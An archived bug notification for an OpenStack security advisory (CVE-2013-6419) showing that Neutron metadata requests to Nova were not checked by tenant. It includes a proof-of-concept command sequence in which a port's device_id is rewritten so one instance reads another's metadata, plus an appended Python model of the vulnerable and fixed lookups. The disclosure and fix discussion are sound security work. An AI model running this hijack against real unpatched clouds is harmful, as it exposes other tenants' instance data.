
yahoo-eng-team team mailing list archive

[Bug 1235450] Re: [OSSA 2013-033] Metadata queries from Neutron to Nova are not restricted by tenant (CVE-2013-6419)


** Changed in: neutron/havana
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1235450

Title:
  [OSSA 2013-033] Metadata queries from Neutron to Nova are not
  restricted by tenant (CVE-2013-6419)

Status in OpenStack Neutron (virtual network service):
  Fix Committed
Status in neutron grizzly series:
  Fix Committed
Status in neutron havana series:
  Fix Released
Status in OpenStack Compute (Nova):
  Fix Committed
Status in OpenStack Compute (nova) grizzly series:
  In Progress
Status in OpenStack Compute (nova) havana series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Committed

Bug description:
  The neutron metadata service works in the following way:

  Instance makes a GET request to http://169.254.169.254/

  This is directed to the metadata-agent, which knows which
  router (namespace) it is running on and determines the ip_address from
  the HTTP request it receives.

  Now, the neutron-metadata-agent queries neutron-server using the
  router_id and ip_address from the request to determine the port the
  request came from. Next, the agent takes the device_id (nova-instance-
  id) on the port and passes that to nova as X-Instance-ID.

  The vulnerability is that if someone exposes their instance_id, their
  metadata can be retrieved. In order to exploit this, one would need to
  update the device_id on a port to match the instance_id they want to
  hijack the data from.

  To demonstrate:

  arosen@arosen-desktop:~/devstack$ nova list
  +--------------------------------------+------+--------+------------+-------------+------------------+
  | ID                                   | Name | Status | Task State | Power State | Networks         |
  +--------------------------------------+------+--------+------------+-------------+------------------+
  | 1eb33bf1-6400-483a-9747-e19168b68933 | vm1  | ACTIVE | None       | Running     | private=10.0.0.4 |
  | eed973e2-58ea-42c4-858d-582ff6ac3a51 | vm2  | ACTIVE | None       | Running     | private=10.0.0.3 |
  +--------------------------------------+------+--------+------------+-------------+------------------+

  
  arosen@arosen-desktop:~/devstack$ neutron port-list
  +--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
  | id                                   | name | mac_address       | fixed_ips                                                                       |
  +--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
  | 3128f195-c41b-4160-9a42-40e024771323 |      | fa:16:3e:7d:a5:df | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.1"} |
  | 62465157-8494-4fb7-bdce-2b8697f03c12 |      | fa:16:3e:94:62:47 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.4"} |
  | 8473fb8d-b649-4281-b03a-06febf61b400 |      | fa:16:3e:4f:a3:b0 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.2"} |
  | 92c42c1a-efb0-46a6-89eb-a38ae170d76d |      | fa:16:3e:de:9a:39 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.3"} |
  +--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+

  
  arosen@arosen-desktop:~/devstack$ neutron port-show  62465157-8494-4fb7-bdce-2b8697f03c12
  +-----------------------+---------------------------------------------------------------------------------+
  | Field                 | Value                                                                           |
  +-----------------------+---------------------------------------------------------------------------------+
  | admin_state_up        | True                                                                            |
  | allowed_address_pairs |                                                                                 |
  | device_id             | 1eb33bf1-6400-483a-9747-e19168b68933                                            |
  | device_owner          | compute:None                                                                    |
  | extra_dhcp_opts       |                                                                                 |
  | fixed_ips             | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.4"} |
  | id                    | 62465157-8494-4fb7-bdce-2b8697f03c12                                            |
  | mac_address           | fa:16:3e:94:62:47                                                               |
  | name                  |                                                                                 |
  | network_id            | 5f68c45d-b729-4e21-9ded-089848eb4ef2                                            |
  | security_groups       | 3e29d8e7-0195-4438-a49a-9706736b888d                                            |
  | status                | ACTIVE                                                                          |
  | tenant_id             | 0f9d696fc73d4110ab492ca105881b9b                                                |
  +-----------------------+---------------------------------------------------------------------------------+

  arosen@arosen-desktop:~/devstack$ neutron port-show  92c42c1a-efb0-46a6-89eb-a38ae170d76d
  +-----------------------+---------------------------------------------------------------------------------+
  | Field                 | Value                                                                           |
  +-----------------------+---------------------------------------------------------------------------------+
  | admin_state_up        | True                                                                            |
  | allowed_address_pairs |                                                                                 |
  | device_id             | eed973e2-58ea-42c4-858d-582ff6ac3a51                                            |
  | device_owner          | compute:None                                                                    |
  | extra_dhcp_opts       |                                                                                 |
  | fixed_ips             | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.3"} |
  | id                    | 92c42c1a-efb0-46a6-89eb-a38ae170d76d                                            |
  | mac_address           | fa:16:3e:de:9a:39                                                               |
  | name                  |                                                                                 |
  | network_id            | 5f68c45d-b729-4e21-9ded-089848eb4ef2                                            |
  | security_groups       | 3e29d8e7-0195-4438-a49a-9706736b888d                                            |
  | status                | ACTIVE                                                                          |
  | tenant_id             | 0f9d696fc73d4110ab492ca105881b9b                                                |
  +-----------------------+---------------------------------------------------------------------------------+

  From vm2 (eed973e2-58ea-42c4-858d-582ff6ac3a51): 
  $ curl http://169.254.169.254/latest/meta-data/hostname
  vm2.novalocal

  arosen@arosen-desktop:~/devstack$ neutron port-update 92c42c1a-efb0-46a6-89eb-a38ae170d76d --device_id=1eb33bf1-6400-483a-9747-e19168b68933

  From vm2 (eed973e2-58ea-42c4-858d-582ff6ac3a51):
  $ curl http://169.254.169.254/latest/meta-data/hostname
  vm1.novalocal

  
  In order to fix this issue I believe we need to also pass the tenant-id
  in the metadata request to nova. When nova receives the request it will
  now have to query its database using the instance_id and check that the
  tenant_ids match. Using the tenant_id solves this issue as the user is
  not allowed to specify or update this field.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1235450/+subscriptions
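The following is an added example, not code from the bug report or from Neutron/Nova, that models the two-hop lookup described above (source IP -> port -> device_id -> Nova) with a pre-fix Nova lookup beside one that enforces the proposed tenant check. It uses the instance and tenant ids from the report but assumes a second, constructed tenant that owns vm2, so that the cross-tenant case the advisory title refers to can be shown; the in-memory tables stand in for the Neutron and Nova databases.

```python
from typing import Dict, Optional, Tuple

# Constructed data: the instance and tenant ids come from the bug report; the
# second tenant is made up so the cross-tenant case can be shown.
VM1 = "1eb33bf1-6400-483a-9747-e19168b68933"
VM2 = "eed973e2-58ea-42c4-858d-582ff6ac3a51"
TENANT_A = "0f9d696fc73d4110ab492ca105881b9b"
TENANT_B = "constructed-tenant-b"

# Nova's view: instance id -> (owning project, hostname)
INSTANCES: Dict[str, Tuple[str, str]] = {
    VM1: (TENANT_A, "vm1.novalocal"),
    VM2: (TENANT_B, "vm2.novalocal"),
}
# Neutron's view inside one router namespace: fixed IP -> (device_id, tenant_id).
# device_id is writable by the port owner (port-update); tenant_id is not.
# 10.0.0.3 is vm2's port after its device_id was rewritten to vm1's id.
PORTS: Dict[str, Tuple[str, str]] = {
    "10.0.0.4": (VM1, TENANT_A),
    "10.0.0.3": (VM1, TENANT_B),
}

def agent_resolve(ip_address: str) -> Tuple[str, str]:
    """neutron-metadata-agent: source IP of the request -> (device_id, tenant_id)."""
    if ip_address not in PORTS:
        raise LookupError("no port with fixed IP %s" % ip_address)
    return PORTS[ip_address]

def nova_hostname_vulnerable(instance_id: str) -> Optional[str]:
    """Pre-fix Nova: answers for whatever X-Instance-ID it is handed."""
    inst = INSTANCES.get(instance_id)
    return inst[1] if inst else None

def nova_hostname_fixed(instance_id: str, tenant_id: str) -> Optional[str]:
    """Fixed Nova: the tenant forwarded by Neutron must own the instance."""
    inst = INSTANCES.get(instance_id)
    if inst is None or inst[0] != tenant_id:
        return None  # mismatch is reported as not found, never another tenant's data
    return inst[1]

def fetch_hostname(ip_address: str, fixed: bool) -> Optional[str]:
    """End to end: the instance at ip_address asks 169.254.169.254 for its hostname."""
    device_id, tenant_id = agent_resolve(ip_address)
    if fixed:
        return nova_hostname_fixed(device_id, tenant_id)
    return nova_hostname_vulnerable(device_id)

if __name__ == "__main__":
    print(fetch_hostname("10.0.0.4", fixed=True))   # vm1.novalocal: legitimate
    print(fetch_hostname("10.0.0.3", fixed=False))  # vm1.novalocal: hijacked
    print(fetch_hostname("10.0.0.3", fixed=True))   # None: tenant mismatch
```

Note that the report's own demo has both instances in the same tenant, where a tenant check alone cannot distinguish the two ports; the check closes the cross-tenant exposure, which is what the advisory is about.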